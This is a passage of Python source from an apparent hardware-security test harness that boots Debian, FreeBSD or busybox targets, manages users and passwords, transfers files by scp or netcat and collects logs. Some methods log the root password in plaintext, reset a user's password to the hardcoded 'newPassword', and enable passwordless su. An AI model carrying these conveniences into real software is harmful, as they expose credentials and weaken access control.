pool self.runCommand('sed -i "" "/^pool/d" /etc/ntp.conf') # Add AWS NTP server self.runCommand(f"echo 'server {awsNtpServer} iburst' >> " "/etc/ntp.conf") else: self.runCommand("echo \"nameserver 1.1.1.1\" > /etc/resolv.conf") # Add ntpd to rc.conf and start it self.runCommand("echo 'ntpd_enable=\"YES\"' >> /etc/rc.conf") self.runCommand("echo 'ntpd_sync_on_start=\"YES\"' >> /etc/rc.conf") self.runCommand("service ntpd start",timeout=120 if (self.procLevel=='p3') else 60) # Instruct the kernel debugger to restart instead of debugging mode when the kernel panics if ((self.binarySource=="SRI-Cambridge") and (self.osImage=='FreeBSD') and (self.target=='awsf1')): self.runCommand("sysctl debug.debugger_on_panic=0") self.runCommand('echo "debug.debugger_on_panic=0" >> /etc/sysctl.conf') # disable core dump for FreeBSD targets if ((self.osImage=='FreeBSD') and isEqSetting('mode','evaluateSecurityTests')): self.runCommand("sysctl kern.coredump=0") if self.osImage in ['debian', 'FreeBSD'] and ((self.binarySource!="SRI-Cambridge")): printAndLog(f"{self.targetIdInfo}start: setting motd...",doPrint=(not self.targetId)) motdPath = '/etc/motd.template' if (self.osImage=='FreeBSD') else '/etc/motd' instanceType = f"{self.binarySource} / {self.osImage} / {self.processor}" self.runCommand(f"printf '\\nInstance type: {instanceType}\\n\\n' > {motdPath}") if (self.osImage=='FreeBSD'): self.runCommand("service motd restart") printAndLog (f"{self.targetIdInfo}start: {self.osImage} booted successfully!") return @decorate.debugWrap def interact(self): #This method gives the control back to the user if (self.inInteractMode): return #avoid recursive interact mode self.inInteractMode = True if (self.userCreated): if isEnabled("useCustomCredentials"): printAndLog(f"Note that there is another user. 
User name: \'{self.userName}\'.") if (not isEnabled('gdbDebug')): # Log out to prompt user to log in using their credentials. # We can't log in for them because we only have the hash of # their password output = self.runCommand("exit", endsWith="login:")[1] printAndLog("Please log in using the credentials you supplied") # Print login prompt from OS. Drop the first 2 lines because # those contain the exit / logout messages from running the # `exit` command print("\n".join(output.split("\n")[2:]), end="") else: printAndLog (f"Note that there is another user. User name: \'{self.userName}\'. Password: \'{self.userPassword}\'.") printAndLog ("Now the shell is logged in as: \'{0}\'.".format('root' if self.isCurrentUserRoot else self.userName)) try: self.process.interact(escape_character='\x05') #escaping interact closes the logFile, which will make any read/write fail inside pexpect logging self.fTtyOut = ftOpenFile(self.fTtyOut.name,self.fTtyOut.mode) except Exception as exc: errorAndLog(f"Failed to open interactive mode.",exc=exc) @decorate.debugWrap @decorate.timeWrap def changeRootPassword(self): printAndLog(f"{self.targetIdInfo}Changing the root password...", doPrint=False) alphabet = string.ascii_letters + string.digits + "!@#$%^&*(-_=+)" self.rootPassword = ''.join(secrets.choice(alphabet) for i in range(14)) if (self.osImage=='debian'): self.runCommand(f"passwd root", endsWith="New password:") self.runCommand(self.rootPassword, endsWith="Retype new password:") self.runCommand(self.rootPassword, expectedContents='password updated successfully') elif (self.osImage=='FreeBSD'): userPasswordHash = sha512_crypt(self.rootPassword) command = (f"echo \'{userPasswordHash}\' | " f"pw usermod root -H 0") self.runCommand(command, erroneousContents="pw:") else: self.terminateAndExit( f"<update root password> is not implemented for <{self.osImage}> on <{self.target}>.", exitCode=EXIT.Implementation) printAndLog(f"{self.targetIdInfo}root password has been changed successfully to <{self.rootPassword}>.") @decorate.debugWrap @decorate.timeWrap def enableRootUserAccess(self): """ Enable passwordless `su` for users in the `wheel` group and add the user to `wheel`. 
""" printAndLog(f"{self.targetIdInfo}Enabling root user access...",doPrint=(not self.targetId)) if (self.osImage=='debian'): self.runCommand('sed -i "s/# auth sufficient pam_wheel.so trust/auth sufficient pam_wheel.so trust/" ' '/etc/pam.d/su') self.runCommand("groupadd wheel") self.runCommand(f"usermod -aG wheel {self.userName}") elif (self.osImage=='FreeBSD'): self.runCommand('sed -i "" "s/auth\\t\\trequisite\\tpam_group.so/' 'auth\\t\\tsufficient\\tpam_group.so/" ' '/etc/pam.d/su') self.runCommand(f"pw group mod wheel -m {self.userName}") else: self.terminateAndExit("<enableRootUserAccess> is not implemented " f"for <{self.osImage}>.", overrideConsole=True, exitCode=EXIT.Implementation) @decorate.debugWrap @decorate.timeWrap def createUser (self): printAndLog (f"{self.targetIdInfo}Creating a user...",doPrint=(not self.targetId)) if (self.osImage=='debian'): self.runCommand (f"useradd -m {self.userName} && echo \"{self.userName}:{self.userPassword}\" | chpasswd") self.runCommand (f"usermod --shell /bin/bash {self.userName}") self.runCommand(f"echo \"PS1=\'\${{debian_chroot:+(\$debian_chroot)}}\\u@\\h:\\w\$ \'\" >> /home/{self.userName}/.bashrc") elif (self.osImage=='FreeBSD'): self.runCommand (f"echo \"{self.userName}::::::{self.userName}::sh:{self.userPassword}\" | adduser -f -",expectedContents=f"Successfully added ({self.userName}) to the user database.",timeout=90) elif (self.osImage=='busybox'): self.runCommand ("mkdir -p /home/{0}".format(self.userName)) self.runCommand ("adduser {0}".format(self.userName),endsWith="New password:",expectedContents='Changing password') self.runCommand (self.userPassword,endsWith="Retype password:") self.runCommand (self.userPassword,expectedContents='changed by root') else: self.terminateAndExit(f"<createUser> is not implemented for <{self.osImage}> on <{self.target}>.",overrideConsole=True,exitCode=EXIT.Implementation) self.userCreated = True printAndLog (f"{self.targetIdInfo}User created!",doPrint=(not self.targetId)) @decorate.debugWrap @decorate.timeWrap def changeUserPassword(self): """ Change the user's password hash to userPasswordHash from the configuration file. 
Precondition: useCustomCredentials must be True in the configuration file Precondition: User must have already been created """ if not isEnabled("useCustomCredentials"): self.terminateAndExit("<changeUserPassword> cannot be called if " "<useCustomCredentials> is False.", exitCode=EXIT.Dev_Bug) if not self.userCreated: self.terminateAndExit("<changeUserPassword> cannot be called if " "user has not been created.", exitCode=EXIT.Dev_Bug) if not self.isCurrentUserRoot: self.switchUser() printAndLog(f"{self.targetIdInfo}Changing user {self.userName}'s password",doPrint=(not self.targetId)) userPasswordHash = getSetting("userPasswordHash") if (self.osImage=='debian'): command = f"usermod -p \'{userPasswordHash}\' {self.userName}" res = self.runCommand(command) elif (self.osImage=='FreeBSD'): command = (f"echo \'{userPasswordHash}\' | " f"pw usermod {self.userName} -H 0") self.runCommand(command, erroneousContents="pw:") else: self.terminateAndExit("<createUser> is not implemented for " f"<{self.osImage}> on " f"<{self.target}>.", overrideConsole=True, exitCode=EXIT.Implementation) @decorate.debugWrap def getDefaultEndWith (self,userName=None): if (not self.userCreated): isRoot = True elif (userName is None): isRoot = self.isCurrentUserRoot else: isRoot = (userName != self.userName) if (self.osImage=='debian'): if (isRoot): return ":~#" else: return ":~\$" elif (self.osImage=='FreeBSD'): if (isRoot): if (self.target=='awsf1'): return ":~ #" else: return "besspinPrompt>" else: return ":~ \$" elif (self.osImage=='busybox'): if (isRoot): return "~ #" else: return "\$" else: self.terminateAndExit(f"<getDefaultEndWith> is not implemented for <{self.osImage}>.",exitCode=EXIT.Implementation) @decorate.debugWrap def getAllEndsWith (self): if (self.osImage=='debian'): return [":~#", ":~\$"] elif (self.osImage=='FreeBSD'): if (self.target=='awsf1'): return [":~ #", ":~ \$"] else: return ["besspinPrompt>", ":~ \$"] elif (self.osImage=='busybox'): return ["~ #", "\$"] else: self.terminateAndExit(f"<getAllEndsWith> is not implemented for <{self.osImage}>.",exitCode=EXIT.Implementation) @decorate.debugWrap @decorate.timeWrap def runCommand (self,command,endsWith=None,expectedContents=None, erroneousContents=None,exitOnError=True,timeout=60,overrideShutdown=False, suppressErrors=False,tee=None,sendToNonUnix=False,issueInterrupt=True,process=None): """ " runCommand: Sends `command` to the target, and wait for a reply. " ARGUMENTS: " ---------- " command: The string to send to target using `sendToTarget`. If FreeRTOS, we do nothing with it. " endsWith: String/regex or list of strings/regex. The function returns when either is received from target. " expectedContents: string or list of strings. If either is not found in the target's response --> error " erroneousContents: string or list of strings. If either is found in the target's response --> error " exitOnError: Boolean. Whether to return or terminateAndExit in case of error (timeout or contents related error) " timeout: how long to wait for endsWith before timing out. " overrideShutdown: Boolean. Whether to skip "shutdown" when terminating. (Should be used before the target is fully booted) " Note that disabling "exitOnError" renders this redundant. " suppressErrors: Boolean. Whether to print the errors on screen, or just report it silently. " tee: A file object to write the text output to. Has to be a valid file object to write. " sendToNonUnix: Boolean. If enabled, the command is sent to non-Unix targets as well. 
" issueInterrupt: use keyboardInterrupt to resolve timeout recovery " process: runCommand with a different process than self.process " RETURNS: " -------- " A list: [isSuccess : "Boolean. True on no-errors.", " textBack : "A string containing all text returned back from the target after sending the command.", " wasTimeout : "Boolean. True if timed-out waiting for endsWith.", " idxEndsWith: The index of the endsWith received. If endsWith was a string, this would be 0. -1 on time-out. """ process = self.process if process is None else process if (self.processor=='bluespec_p3'): timeout += 60 if (isEnabled('isUnix',targetId=self.targetId) or sendToNonUnix): self.sendToTarget (command,exitOnError=exitOnError,process=process) if (endsWith is None): endsWith = self.getDefaultEndWith() textBack, wasTimeout, idxEndsWith = self.expectFromTarget (endsWith,command,exitOnError=exitOnError, overrideShutdown=overrideShutdown, timeout=timeout,issueInterrupt=issueInterrupt, process=process,suppressWarnings=suppressErrors) logging.debug(f"runCommand: After expectFromTarget: <command={command}>, <endsWith={endsWith}>") logging.debug(f"wasTimeout={wasTimeout}, idxEndsWith={idxEndsWith}") logging.debug(f"textBack:\n{textBack}") isSuccess = not wasTimeout if (expectedContents is not None): if (isinstance(expectedContents,str)): #only one string expectedContents = [expectedContents] for content in expectedContents: if (content not in textBack): isSuccess = False errorAndLog (f"runCommand: Missing <{content}> while executing <{command}>.",doPrint=not suppressErrors) break #One error per command is enough if (erroneousContents is not None): if (isinstance(erroneousContents,str)): #only one string erroneousContents = [erroneousContents] for content in erroneousContents: if (content in textBack): isSuccess = False errorAndLog (f"runCommand: Encountered <{content}> while executing <{command}>.",doPrint=not suppressErrors) break #One error per command is enough if (tee): try: tee.write(textBack) except Exception as exc: isSuccess = False try: fName = tee.name except: fName = 'UNKNOWN_FILE' errorAndLog (f"runCommand: Failed to tee the output to <{fName}> while executing <{command}>.",doPrint=not suppressErrors,exc=exc) if (exitOnError and not isSuccess): self.terminateAndExit(f"runCommand: fatal error.",exitCode=EXIT.Run) return [isSuccess, textBack, wasTimeout, idxEndsWith] #the 3rd argument is "timed-out" # Send a between host and target. # xFile : file to send # pathToFile : directory containing xFile on host # targetPathToFile : directory containing xFile on target # toTarget : direction of send. # True[default] = send from host to target # False = send from target to host. Requires an SSH connection. @decorate.debugWrap @decorate.timeWrap def sendFile (self,pathToFile,xFile,targetPathToFile=None,toTarget=True,forceScp=False,timeout=30,exitOnError=True): #send File to target if (not isEnabled('isUnix',targetId=self.targetId)): self.terminateAndExit(f"<sendFile> is not implemented for <{self.osImage}> on <{self.target}>.",exitCode=EXIT.Implementation) def returnFalse (message='',noRetries=False,exc=None,fileToClose=None): if not (self.osImage in ['debian', 'FreeBSD'] and (forceScp or self.isSshConn)): self.keyboardInterrupt () if (exc): logging.error(traceback.format_exc()) if ((not noRetries) and (self.resendAttempts < self.limitResendAttempts-1)): logging.error(message) errorAndLog (f"sendFile: Failed to send <{pathToFile}/{xFile}> to target. 
Trying again...") self.resendAttempts += 1 return self.sendFile (pathToFile,xFile,targetPathToFile=targetPathToFile,toTarget=toTarget,timeout=timeout,exitOnError=exitOnError,forceScp=forceScp) elif (exitOnError): self.terminateAndExit (message + f"\nsendFile: Failed to send <{pathToFile}/{xFile}> to target.",exitCode=EXIT.Run) else: logging.error(message) errorAndLog (f"sendFile: Failed to send <{pathToFile}/{xFile}> to target.") return False if ( (self.ipTarget is None) or (self.portTarget is None) or (self.portHost is None) ): return returnFalse ("Ethernet not properly activated. <sendFile> can not execute.",noRetries=True) def checksumHost(f): #find the sha256sum of the file shaSumTX = str(subprocess.check_output (f"sha256sum {f} | awk '{{ print $1 }}'",stderr=subprocess.STDOUT,shell=True),'utf-8').strip() logging.debug(f"Output from <sha256sum>:\n{shaSumTX}") return shaSumTX def checksumTarget(f): shaSumRX = None if (self.osImage=='debian'): timeoutSha = 180 if (self.processor=='bluespec_p3') else 120 retShaRX = self.runCommand(f"sha256sum {f}",timeout=timeoutSha)[1] elif (self.osImage=='FreeBSD'): retShaRX = self.runCommand(f"sha256 {f}",timeout=120)[1] retShaRX += self.runCommand(" ")[1] logging.debug(f"retShaRX:\n{retShaRX}") for line in retShaRX.splitlines(): if (self.osImage=='debian'): shaMatch = re.match(rf"^(?P<shaSum>[0-9a-f]+)\s+ {f}\s*$",line) elif (self.osImage=='FreeBSD'): shaMatch = re.match(rf"^SHA256 \({f}\) = (?P<shaSum>[0-9a-f]+)$",line) if (shaMatch is not None): shaSumRX = shaMatch.group('shaSum') break if (shaSumRX is None): raise return shaSumRX # The path to the file on the target currentUser = 'root' if self.isCurrentUserRoot else self.userName user_path = 'root' if self.isCurrentUserRoot else 'home/' + self.userName targetPathRoot = f"/{user_path}" if targetPathToFile is None else targetPathToFile targetPath = os.path.join(targetPathRoot,xFile) # The path to the file on the host hostPath = os.path.join(pathToFile,xFile) try: f = hostPath if toTarget else targetPath shaSumTX = checksumHost(f) if toTarget else checksumTarget(f) except Exception as exc: return returnFalse (f"Failed to obtain the checksum of <{f}>.",noRetries=True,exc=exc) if (self.osImage in ['debian', 'FreeBSD'] and (forceScp or self.isSshConn)): #send through SSH if (currentUser == 'root'): self.enableSshOnRoot() portPart = '' if (not self.sshHostPort) else f" -P {self.sshHostPort}" # if sending TO target, then "scp host target" otherwise flipped scpTargetPath = f"{currentUser}@{self.ipTarget}:{targetPath}" scpArgs = f"{hostPath} {scpTargetPath}" if toTarget else f"{scpTargetPath} {hostPath}" scpCommand = f"env -u SSH_AUTH_SOCK scp{portPart} {scpArgs}" passwordPrompt = [f"Password for {currentUser}@[\w-]+\:",f"{currentUser}@[\w\-\.]+\'s password\:","\)\?"] scpOutFile = ftOpenFile(os.path.join(getSetting('workDir'),f'scp{self.targetSuffix}.out'),'a') if (not self.sshECDSAkeyWasUpdated): self.clearHostKey() try: scpProcess = pexpect.spawn(scpCommand,encoding='utf-8',logfile=scpOutFile,timeout=15) except Exception as exc: return returnFalse (f"Failed to spawn an scp process for sendFile.",exc=exc) self.genStdinEntropy(endsWith=self.getAllEndsWith()) #get some entropy going on try: retExpect = scpProcess.expect(passwordPrompt + ["\)\?"],timeout=30) except Exception as exc: return returnFalse (f"Unexpected outcome from the scp command.",exc=exc) try: if (retExpect == 2): #needs a yes scpProcess.sendline("yes") retExpect = scpProcess.expect(passwordPrompt,timeout=15) if (retExpect in [0,1]): #password 
prompt pwd = self.rootPassword if self.isCurrentUserRoot else self.userPassword scpProcess.sendline(pwd) else: return returnFalse (f"Failed to authenticate the scp process.") except Exception as exc: return returnFalse (f"Unexpected error while using the scp command [sending password].",exc=exc) try: scpProcess.expect(pexpect.EOF,timeout=timeout) except Exception as exc: return returnFalse (f"Unexpected error while using scp command [waiting for termination].",exc=exc) scpOutFile.close() time.sleep(5) self.keyboardInterrupt (exitOnError=True) else: #send the file through netcat if not toTarget: return returnFalse("sendFile: sending a file FROM the target requires an SSH connection", noRetries=True) if (self.osImage=='debian'): listenOnTarget = threading.Thread(target=self.runCommand, kwargs=dict(command=f"nc -lp {self.portTarget} > {targetPath}",timeout=timeout,exitOnError=False)) elif (self.osImage=='FreeBSD'): listenOnTarget = threading.Thread(target=self.runCommand, kwargs=dict(command=f"nc -I 1024 -l {self.portTarget} > {targetPath}",timeout=timeout,exitOnError=False)) listenOnTarget.daemon = True getSetting('trash').throwThread(listenOnTarget,f"nc listening for <{xFile}> on Target") sendFromHost = threading.Thread(target=subprocess.call, kwargs=dict(args=f"nc -w 1 {self.ipTarget} {self.portHost} <{hostPath}",shell=True)) sendFromHost.daemon = True getSetting('trash').throwThread(sendFromHost,f"nc sending <{pathToFile}/{xFile}> from host") listenOnTarget.start() time.sleep(5) sendFromHost.start() listenOnTarget.join(timeout=timeout+5) #arbitrarily set timeout #check sending if (sendFromHost.is_alive()): logging.warning(f"sendFile: Netcat sending from host is still hanging while sending <{xFile}> to target.\n") if (listenOnTarget.is_alive() or (not self.doesFileExist(xFile,timeout=timeout,exitOnError=False))): return returnFalse() #obtaining the checksum try: f = targetPath if not toTarget else hostPath shaSumRX = checksumTarget(targetPath) if toTarget else checksumHost(hostPath) except Exception as exc: return returnFalse (f"Failed to obtain the checksum of <{f}>.",noRetries=True,exc=exc) if (shaSumRX != shaSumTX): return returnFalse(f"sendFile: Checksum from <{xFile}> on target does not match.") self.resendAttempts = 0 #reset return True @decorate.debugWrap def doesFileExist (self,xFile,pathToFile='.',timeout=15,exitOnError=True): return self.runCommand(f"ls {pathToFile}/{xFile}",suppressErrors=True,expectedContents=xFile,erroneousContents=['ls:', 'cannot access', 'No such file or directory'],timeout=timeout,exitOnError=exitOnError)[0] @decorate.debugWrap def sendTar(self,timeout=30): #send tarball to target printAndLog (f"{self.targetIdInfo}sendTar: Sending files...",doPrint=(not self.targetId)) #---send the archive if ((self.binarySource in ['GFE', 'SRI-Cambridge']) and (self.osImage=='FreeBSD')): if (self.userCreated): self.switchUser() #this is assuming it was on root self.sendFile (getSetting('buildDir',targetId=self.targetId),self.tarballName,timeout=timeout,forceScp=True) if (self.userCreated): self.switchUser() self.runCommand(f"mv /home/{self.userName}/{self.tarballName} /root/") else: self.sendFile (getSetting('buildDir',targetId=self.targetId),self.tarballName,timeout=timeout) #---untar if (self.osImage=='debian'): untarProcess = None if (self.processor!='bluespec_p3') else self.ttyProcess self.runCommand(f"tar xvf {getSetting('tarballName')} --warning=no-timestamp", erroneousContents=['gzip:','Error','tar:','Segmentation fault'],timeout=timeout, process=untarProcess) elif 
(self.osImage=='FreeBSD'): self.runCommand(f"tar xvf {self.tarballName} -m",erroneousContents=['gzip:','Error','tar:'],timeout=timeout) self.runCommand(f"rm {self.tarballName}",timeout=timeout) #to save space printAndLog (f"{self.targetIdInfo}sendTar: Sending successful!",doPrint=(not self.targetId)) @decorate.debugWrap @decorate.timeWrap def runFettApps (self,sendFiles=False,timeout=60): #executes the app printAndLog ("runFettApps: Starting the application stack...") if (sendFiles): #send any needed files to target if (self.procLevel=='p3'): timeout *= 4 self.sendTar(timeout=timeout) # assign modules if (self.osImage=='FreeRTOS'): self.appModules = [freertos] elif (self.osImage in ['debian', 'FreeBSD']): self.appModules = [ssh, webserver, database, voting] if (self.binarySource=='MIT'): #Disable nginx self.appModules.remove(webserver) self.appModules.remove(voting) #hosted by the webserver else: self.terminateAndExit(f"<runFettApps> is not implemented for <{self.osImage}>.",exitCode=EXIT.Implementation) # The appLog will be the file object flying around for logging into app.out appLog = ftOpenFile(os.path.join(getSetting('workDir'),'app.out'), 'a') appLog.write('-'*20 + "<BESSPIN-TOOL-SUITE-OUT>" + '-'*20 + '\n\n') setSetting("appLog",appLog) if (self.binarySource=='SRI-Cambridge'): setSetting('sqliteBin','/fett/bin/sqlite3') else: setSetting('sqliteBin','/usr/bin/sqlite') # Install for appModule in self.appModules: appModule.install(self) appLog.flush() # Test for appModule in self.appModules: appModule.deploymentTest(self) appLog.flush() appLog.close() logging.info (f"runFettApps: The application stack is deployed successfully!\n") return @decorate.debugWrap @decorate.timeWrap def collectLogs (self): if (self.osImage not in ['debian', 'FreeBSD']): printAndLog(f"No logs to be collected from <{self.osImage}>.",doPrint=False) return # Collect all logs into one directory logsPathName = 'logsFromTarget' logsPathOnTarget = f'/root/{logsPathName}' self.runCommand(f"mkdir {logsPathName}") # Apps logs for appModule in self.appModules: if hasattr(appModule, "dumpLogs"): appModule.dumpLogs(self, logsPathOnTarget) printAndLog (f"collectLogs: Collected <{appModule.__name__.split('.')[-1]}> logs.") else: printAndLog (f"collectLogs: nothing to do for module <{appModule.__name__.split('.')[-1]}>.",doPrint=False) # syslogs self.runCommand (f"cp /var/log/* {logsPathOnTarget}") #On debian, this returns `cp: ommitted directories` self.runCommand(f"dmesg > {os.path.join(logsPathOnTarget,'dmesg.txt')}") printAndLog (f"collectLogs: Collected syslogs.") # Create the tarball logsTarball = 'logsFromTarget.tar' self.runCommand(f"tar cvf {logsTarball} {logsPathName}",erroneousContents=['gzip:','Error','tar:']) self.runCommand(f"mv {logsTarball} /home/{self.userName}/{logsTarball}") self.runCommand(f"chown {self.userName}:{self.userName} /home/{self.userName}/{logsTarball}",erroneousContents=['chown:']) # Maybe the researcher has changed the password for some reason self.userPassword = 'newPassword' salt = crypt.mksalt() newHash = crypt.crypt(self.userPassword, salt) if (self.osImage=='debian'): self.runCommand(f"usermod -p \'{newHash}\' {self.userName}") elif (self.osImage=='FreeBSD'): self.runCommand (f"echo \'{newHash}\' | pw usermod {self.userName} -H 0",erroneousContents="pw:") # send the tarball to the artifacts directory using non-root SCP self.switchUser () #login as user artifactPath = getSetting('extraArtifactsPath') if(self.sendFile( artifactPath, logsTarball, targetPathToFile=f'/home/{self.userName}', 
forceScp=True, toTarget=False, exitOnError=False )): printAndLog(f"collectLogs: Received logs from target.") # untar the tarball to be more friendly tarballPathOnHost = os.path.join(artifactPath,logsTarball) shellCommand (['tar','xvf',tarballPathOnHost,'-C',artifactPath]) #check is True not to delete it by mistake shellCommand (['rm',tarballPathOnHost]) else: errorAndLog(f"collectLogs: Failed to receive logs from target.") self.switchUser () #back to root return @decorate.debugWrap def keyboardInterrupt ( self, exitOnError=True, timeout=15, retryCount=3, process=None, endsWith=None, sendToNonUnix=False, respondEndsWith=None): """ " keyboardInterrupt: Attemtps to ^C and recover. " ARGUMENTS: " ---------- " exitOnError: Boolean. Whether to return or terminateAndExit in case of error. " timeout: how long to wait for endsWith before timing out. " retryCount: How many retries/(^Cs) before error. " process: runCommand with a different process than self.process " endsWith: String/regex or list of strings/regex. The expected returns when either is received from target. " sendToNonUnix: Boolean. If enabled, the command is sent to non-Unix targets as well. " respondEndsWith: A tuple: (A special endsWith, what to respond if encountered it) " -------- " RETURNS: " A string containing all text returned back from the target during the resolving of the interrupt. """ process = self.process if process is None else process if (process is None): self.terminateAndExit(f"{self.targetIdInfo}<keyboardInterrupt> is called, but the process is <None>.", exitCode=EXIT.Run) if (endsWith is None): endsWith = [self.getDefaultEndWith()] elif (isinstance(endsWith,str)): endsWith = [endsWith] if (respondEndsWith is not None): try: specialEndsWith, specialResponse = respondEndsWith except Exception as exc: self.terminateAndExit(f"{self.targetIdInfo}keyboardInterrupt: Called with illegal <respondEndsWith> argument.", overrideShutdown=True,overrideConsole=True,exitCode=EXIT.Dev_Bug) endsWith = [specialEndsWith] + endsWith if (self.terminateTargetStarted and (process == self.process)): return '' if (self.keyboardInterruptTriggered): #to break any infinite loop self.terminateAndExit(f"{self.targetIdInfo}keyboardInterrupt: interrupting is not resolving properly", overrideShutdown=True,overrideConsole=True,exitCode=EXIT.Run) else: self.keyboardInterruptTriggered = True if ((not isEnabled('isUnix',targetId=self.targetId)) and (process == self.process)): self.terminateAndExit(f"{self.targetIdInfo}<keyboardInterrupt> is not implemented for <{self.osImage}>.", exitCode=EXIT.Implementation) doTimeout = True retryIdx = 0 while doTimeout and retryIdx < retryCount: if retryIdx > 0: warnAndLog(f"{self.targetIdInfo}keyboardInterrupt: keyboard interrupt failed! 
Trying again ({retryIdx}/{retryCount})...") retCommand = self.runCommand("\x03",endsWith=endsWith,exitOnError=False,timeout=timeout, issueInterrupt=False,suppressErrors=True,process=process,sendToNonUnix=sendToNonUnix) textBack = retCommand[1] doTimeout = retCommand[2] retryIdx += 1 if ((respondEndsWith is not None) and (retCommand[3]==0)): #Got the special response endsWith.remove(specialEndsWith) textBack += self.runCommand(specialResponse,endsWith=endsWith,exitOnError=exitOnError,timeout=timeout, process=process,suppressErrors=True,sendToNonUnix=sendToNonUnix)[1] elif ((not retCommand[0]) or (retCommand[2])): retCommand2 = self.runCommand(" ",endsWith=endsWith,exitOnError=exitOnError,timeout=timeout, process=process,suppressErrors=True,sendToNonUnix=sendToNonUnix) textBack += retCommand2[1] if ((respondEndsWith is not None) and (retCommand2[3]==0)): #Got the special response endsWith.remove(specialEndsWith) textBack += self.runCommand(specialResponse,endsWith=endsWith[1:],exitOnError=exitOnError,timeout=timeout, process=process,suppressErrors=True,sendToNonUnix=sendToNonUnix)[1] #See if the order is correct if (process): breakRetries = False for i in range(retryIdx + 2): readAfter = self.readFromTarget(readAfter=True,process=process) for xEndsWith in endsWith: if ((xEndsWith in readAfter) or (re.search(xEndsWith,readAfter) is not None)): #Accommodate for regex matching try: process.expect(xEndsWith,timeout=1) except Exception as exc: warnAndLog(f"{self.targetIdInfo}keyboardInterrupt: <{xEndsWith}> was in process.after, " f"but could not pexpect.expect it. Will continue anyway.",doPrint=False,exc=exc) breakRetries = True textBack += readAfter if (breakRetries): break self.keyboardInterruptTriggered = False #Safe to be called again return textBack @decorate.debugWrap def ensureCrngIsUp (self): if (self.osImage!='debian'): self.terminateAndExit(f"<ensureCrngIsUp> is not implemented for <{self.osImage}>.",exitCode=EXIT.Implementation) isCrngUp = False for iAttempt in range(5): retCommand = self.runCommand("dmesg | grep random",expectedContents="crng init done",suppressErrors=True,exitOnError=False,timeout=30) isCrngUp = retCommand[0] retText = retCommand[1] if (isCrngUp): logging.info(f"ensureCrngIsUp: CRNG is properly initialized.\n") break retText += self.runCommand("./addEntropyDebian.riscv",erroneousContents=["bash:","<INVALID>"])[1] if ("crng init done" in retText): isCrngUp = True logging.info(f"ensureCrngIsUp: CRNG is properly initialized.\n") break if (not isCrngUp): self.terminateAndExit(f"ensureCrngIsUp: CRNG was not initialized.",exitCode=EXIT.Run) @decorate.debugWrap def checkFallToTty (self,fnName,process=None): process = self.process if process is None else process if self.process is None or process.fileno() != self.process.fileno(): logging.debug(f"checkFallToTty: returning due to custom process") return if ((not self.process) and self.isSshConn): warnAndLog(f"{fnName}: called with sshConnection, but connection is unreachable. 
Falling back to main tty.",doPrint=False) self.killSshConn() if (not self.process): #Note that this condition cannot be merged with the above one, because killSshConn updates self.process self.terminateAndExit(f"{fnName}: Failed to communicate with target.",overrideShutdown=True,exitCode=EXIT.Run) logging.debug(f"{fnName}: isSshConn = {self.isSshConn}") return @decorate.debugWrap def readFromTarget (self,endsWith=None,readAfter=False,process=None): process = self.process if process is None else process self.checkFallToTty ("readFromTarget", process=process) try: if (readAfter): fetchedBytes = process.after else: #default fetchedBytes = process.before try: if (fetchedBytes == pexpect.TIMEOUT): textBack = '\n<TIMEOUT>\n' elif (fetchedBytes == pexpect.EOF): textBack = '\n<EOF>\n' else: textBack = str(fetchedBytes,'utf-8') except UnicodeDecodeError: textBack = charByCharEncoding(fetchedBytes) warnAndLog (f"{self.targetIdInfo}Unrecognized character while reading from target.",doPrint=False) except Exception as exc: warnAndLog (f"{self.targetIdInfo}Failed to read from target.",doPrint=False,exc=exc) return '' logging.debug(f"{self.targetIdInfo}readFromTarget: <endsWith={endsWith}>") logging.debug(f"{self.targetIdInfo}textBack:\n{textBack}{endsWith}") return textBack @decorate.debugWrap def sendToTarget (self,command,exitOnError=True,process=None): process = self.process if process is None else process self.checkFallToTty ("sendToTarget", process=process) logging.debug(f"{self.targetIdInfo}sendToTarget: sending <{command}>") try: process.sendline(command) except Exception as exc: if (exitOnError): self.terminateAndExit(f"{self.targetIdInfo}sendToTarget: Failed to send <{command}> to {self.target}.",exc=exc,exitCode=EXIT.Run) else: warnAndLog (f"{self.targetIdInfo}sendToTarget: Failed to send <{command}> to {self.target}.",exc=exc,doPrint=False) return @decorate.debugWrap @decorate.timeWrap def expectFromTarget (self,endsWith,command,exitOnError=True,timeout=15,overrideShutdown=False, issueInterrupt=True,process=None,suppressWarnings=False,sshRetry=True): def warningThread(msg, waitingTime, stopEvent, suppressWarnings): """thread will wait on an event, and display warning if not set by waiting time""" dt = 0.1 dt = waitingTime / 10.0 if dt > waitingTime else dt ct = 0.0 while ct < waitingTime: time.sleep(dt) if stopEvent.is_set(): return ct += dt warnAndLog(msg,doPrint=not suppressWarnings) process = self.process if process is None else process # prepare thread to give warning message if the expect is near timing out stopEvent = threading.Event() warningTime = 0.8 * timeout warningMsg = threading.Thread(target=warningThread, args=(f"{self.targetIdInfo}expectFromTarget: command <{command}> is near timeout ({timeout} s)", warningTime, stopEvent,suppressWarnings)) warningMsg.daemon = True getSetting('trash').throwThread(warningMsg, "warning message for expectFromTarget") warningMsg.start() self.checkFallToTty ("expectFromTarget",process=process) logging.debug(f"{self.targetIdInfo}expectFromTarget: <command={command}>, <endsWith={endsWith}>") textBack = '' try: retExpect = process.expect(endsWith,timeout=timeout) if ((endsWith == pexpect.EOF) or isinstance(endsWith,str)): #only one string or EOF textBack += self.readFromTarget(endsWith=endsWith,process=process) else: #It is a list textBack += self.readFromTarget(endsWith=endsWith[retExpect],process=process) except pexpect.TIMEOUT: if (exitOnError): self.terminateAndExit(f"{self.targetIdInfo}expectFromTarget: {self.target.capitalize()} timed out 
<{timeout} seconds> while executing <{command}>.",exitCode=EXIT.Run,overrideShutdown=overrideShutdown) elif (self.osImage!='FreeRTOS'): warnAndLog(f"{self.targetIdInfo}expectFromTarget: <TIMEOUT>: {timeout} seconds while executing <{command}>.",doPrint=False) textBack += self.keyboardInterrupt (exitOnError=True, process=process) if issueInterrupt else "" return [textBack, True, -1] except Exception as exc: if ((self.processor=='bluespec_p3') and (exc.__class__ == pexpect.EOF) and (sshRetry) and (self.isSshConn)): warnAndLog(f"{self.targetIdInfo}SSH connection was unexpectedly dropped. Trying to reconnect...") self.openSshConn(userName='root' if self.isCurrentUserRoot else self.userName) self.sendToTarget(" ") return self.expectFromTarget (endsWith,command,exitOnError=exitOnError,timeout=timeout, overrideShutdown=overrideShutdown,issueInterrupt=issueInterrupt,process=None, suppressWarnings=suppressWarnings,sshRetry=False) self.terminateAndExit(f"{self.targetIdInfo}expectFromTarget: Unexpected output from target while executing 